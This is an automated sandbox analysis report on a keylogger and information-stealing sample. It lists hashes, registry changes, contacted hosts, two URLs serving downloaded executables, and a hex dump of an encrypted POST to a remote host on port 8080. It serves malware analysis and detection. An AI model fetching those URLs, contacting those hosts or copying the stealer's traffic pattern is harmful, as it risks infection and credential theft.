ThreatExpert Report

Submission Summary:

Submission details:

Submission received: 15 August 2012, 06:38:57
Processing time: 11 min 6 sec
Submitted sample:

File MD5: 0x72E7F2B3A45EB6C24669B32D6F0A9FC8
File SHA-1: 0xAE78D88EFDC2CA90BC53BE7D023622D85B1FAA0E
Filesize: 147,968 bytes

Summary of the findings:

What's been found	Severity Level
Capability to steal information such personal financial data (credit card numbers, online banking login details), user profiles, software registration keys, passwords.
Produces outbound traffic.
Downloads/requests other files from Internet.
Contains characteristics of an identified security risk.

Technical Details:

Possible Security Risk

Attention! The following threat category was identified:

Threat Category	Description
	A keylogger program that can capture all user keystrokes (including confidential details such username, password, credit card number, etc.)

File System Modifications

The following files were created in the system:

#	Filename(s)	File Size	File Hash
1	%Temp%\abcd.bat	0 bytes	MD5: 0xD41D8CD98F00B204E9800998ECF8427E SHA-1: 0xDA39A3EE5E6B4B0D3255BFEF95601890AFD80709
2	[file and pathname of the sample #1]	147,968 bytes	MD5: 0x72E7F2B3A45EB6C24669B32D6F0A9FC8 SHA-1: 0xAE78D88EFDC2CA90BC53BE7D023622D85B1FAA0E

Note:

%Temp% is a variable that refers to the temporary folder in the short path form. By default, this is C:\Documents and Settings\[UserName]\Local Settings\Temp\ (Windows NT/2000/XP).

Memory Modifications

There was a new process created in the system:

Process Name	Process Filename	Main Module Size
[filename of the sample #1]	[file and pathname of the sample #1]	102,400 bytes

Registry Modifications

The following Registry Key was created:

HKEY_CURRENT_USER\Software\WinRAR

The newly created Registry Value is:

[HKEY_CURRENT_USER\Software\WinRAR]

HWID = 7B 38 44 41 33 35 37 32 35 2D 30 33 45 33 2D 34 30 31 41 2D 38 46 30 36 2D 35 39 38 31 36 42 43 30 30 32 42 44 7D

Other details

The following Host Names were requested from a host database:

192.5.5.241
74.53.97.66
74.53.97.67
www.obvjutphaas.nl
r555.info

There was registered attempt to establish connection with the remote host. The connection details are:

Remote Host	Port Number
74.53.97.66	8080

The following HTTP URLs were started reading:

http://www.obvjutphaas.nl/wQ7T.exe
http://r555.info/41LMMbt5.exe

Outbound traffic (potentially malicious)

There was an outbound traffic produced on port 8080:

00000000 | 504F 5354 202F 666F 7275 6D2F 7669 6577 | POST /forum/view
00000010 | 746F 7069 632E 7068 7020 4854 5450 2F31 | topic.php HTTP/1
00000020 | 2E30 0D0A 486F 7374 3A20 3734 2E35 332E | .0..Host: 74.53.
00000030 | 3937 2E36 360D 0A41 6363 6570 743A 202A | 97.66..Accept: *
00000040 | 2F2A 0D0A 4163 6365 7074 2D45 6E63 6F64 | /*..Accept-Encod
00000050 | 696E 673A 2069 6465 6E74 6974 792C 202A | ing: identity, *
00000060 | 3B71 3D30 0D0A 436F 6E74 656E 742D 4C65 | ;q=0..Content-Le
00000070 | 6E67 7468 3A20 3435 350D 0A43 6F6E 6E65 | ngth: 455..Conne
00000080 | 6374 696F 6E3A 2063 6C6F 7365 0D0A 436F | ction: close..Co
00000090 | 6E74 656E 742D 5479 7065 3A20 6170 706C | ntent-Type: appl
000000A0 | 6963 6174 696F 6E2F 6F63 7465 742D 7374 | ication/octet-st
000000B0 | 7265 616D 0D0A 436F 6E74 656E 742D 456E | ream..Content-En
000000C0 | 636F 6469 6E67 3A20 6269 6E61 7279 0D0A | coding: binary..
000000D0 | 5573 6572 2D41 6765 6E74 3A20 4D6F 7A69 | User-Agent: Mozi
000000E0 | 6C6C 612F 342E 3020 2863 6F6D 7061 7469 | lla/4.0 (compati
000000F0 | 626C 653B 204D 5349 4520 352E 303B 2057 | ble; MSIE 5.0; W
00000100 | 696E 646F 7773 2039 3829 0D0A 0D0A 4352 | indows 98)....CR
00000110 | 5950 5445 4430 948E 0119 A53F 45D2 4D28 | YPTED0.....?E.M(
00000120 | 1DAB 4759 CA51 C0C0 AA4D FFE4 1FA0 D569 | ..GY.Q...M.....i
00000130 | D686 B818 6678 98C3 1191 4685 6837 5A43 | ....fx....F.h7ZC
00000140 | 0FD4 DCED 1432 F02E 42E8 DC2A DAB1 4110 | .....2..B..*..A.
00000150 | C5A5 4160 B8B2 C65B 79E3 F5A6 BDCA CA95 | ..A`...[y.......
00000160 | 59E8 EA5C D10A 2382 63DC 3C48 A7D3 205C | Y..\..#.c.<H.. \
00000170 | 7514 825A 44CC 205F 4D40 7A7A 27E5 899B | u..ZD. _M@zz'...
00000180 | F637 BECA 9F90 9FC3 3CB1 44F3 657E 23BB | .7......<.D.e~#.
00000190 | 454B 2FAE 7E44 4F02 1340 A83C E128 1258 | EK/.~DO..@.<.(.X
000001A0 | CA68 973E 80B4 A510 4056 8499 9DE7 4832 | .h.>....@V....H2
000001B0 | 6EE4 2DA3 F61E 98A4 28D1 7901 6956 EC5F | n.-.....(.y.iV._
000001C0 | 3C45 6215 A9F9 9857 148D 872F D00A 2460 | <Eb....W.../..$`
000001D0 | DD2B F65D 0348 18AE 5D53 916D E272 2B59 | .+.].H..]S.m.r+Y
000001E0 | FAFF BD73 3ED8 374D B89A FD29 0EC4 5CAA | ...s>.7M...)..\.
000001F0 | 12A9 077A 8AA7 6789 1A16 3A7B D0D3 45E7 | ...z..g...:{..E.
00000200 | EAC4 24C1 54CE 17C9 2A1B 85C3 C18B 5C4A | ..$.T...*.....\J
00000210 | C532 1F8B 51AC E15B 4119 B5D1 9135 7DFD | .2..Q..[A....5}.
00000220 | 9E10 50FB F38F 1554 4135 A420 6F86 CE2F | ..P....TA5. o../
00000230 | E39F 009E 3BC9 D4AD 9D23 E12E 9E02 5606 | ....;....#....V.
00000240 | 84CA 9CB1 2902 A2E1 0FC1 3483 00B7 5CE1 | ....).....4...\.
00000250 | 0283 7E8A 1EBD 49F6 805D A4B2 8F20 7156 | ..~...I..]... qV
00000260 | 3680 CC30 574E AE2E 3E4A 8839 FA21 1694 | 6..0WN..>J.9.!..
00000270 | E42F 0A19 9CBB 9307 E0FE 7C52 49CE BAD7 | ./........|RI...
00000280 | 2861 D27E DC9A 6C91 88D9 7B11 E788 43C3 | (a.~..l...{...C.
00000290 | F2F2 F551 C435 6E82 6DB3 B8E0 AE64 7DBB | ...Q.5n.m....d}.
000002A0 | ACFA F229 13E1 6776 23BF E9A1 911B B897 | ...)..gv#.......
000002B0 | 95E2 C196 0140 637A 49B6 F752 DA2A 58CE | .....@czI..R.*X.
000002C0 | 3C13 B832 80F5 FC18 8713 2DC5 3A92 1774 | <..2......-.:..t
000002D0 | 719E 24B0 9F                            | q.$..

All content ("Information") contained in this report is the copyrighted work of Threat Expert Ltd and its associated companies ("ThreatExpert") and may not be copied without the express permission of ThreatExpert.

The Information is provided on an "as is" basis. ThreatExpert disclaims all warranties, whether express or implied, to the maximum extent permitted by law, including the implied warranties that the Information is merchantable, of satisfactory quality, accurate, fit for a particular purpose or need, or non-infringing, unless such implied warranties are legally incapable of exclusion. Further, ThreatExpert does not warrant or make any representations regarding the use or the results of the use of the Information in terms of their correctness, accuracy, reliability, or otherwise.